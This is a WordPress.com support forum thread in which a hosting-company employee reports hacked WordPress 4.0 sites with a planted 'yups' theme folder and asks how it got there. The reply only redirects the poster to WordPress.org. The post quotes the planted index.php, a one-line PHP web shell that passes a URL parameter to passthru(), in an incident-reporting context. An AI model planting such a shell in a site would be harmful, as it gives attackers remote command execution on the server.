hacked wordpress sites, has themes/yups folder
-
Hi,
I work for a website hosting company, and have discovered two separate hacked sites, both running version 4.0, that have the same folder in wp-content/themes called yups. One had another folder called once with the same files.
index.php
mail.php
style.css
Browsing to the folder returned the text “SENDER UP”
The mail.php file has obvious mailing code, but I am not sure exactly what it does.
index.php has the following;
<?php
passthru($_GET[‘cx’]);
?>Not sure if anyone has any idea how this got in, or has seen it before, but if any light can be shed, it would be appreciated.
I will post further if I find anything.
-
We are unable to provide support for any blogs that are not hosted here by WordPress.COM.
WordPress.com and WordPress.org are completely separate and have different logins, features, run different versions of some themes with the same names, and have separate support forums. http://support.wordpress.com/com-vs-org/
If you don’t have a username account at WordPress.ORG click http://wordpress.org/support/ and register one on the top right hand corner of the page that opens, so you can post to the support forums there and receive advice from WordPress.ORG bloggers.
Resetting your WordPress.ORG password http://codex.wordpress.org/Resetting_Your_Password
WordPress.org support docs are at https://codex.wordpress.org/Main_Page
- The topic ‘hacked wordpress sites, has themes/yups folder’ is closed to new replies.
WordPress.com Forums 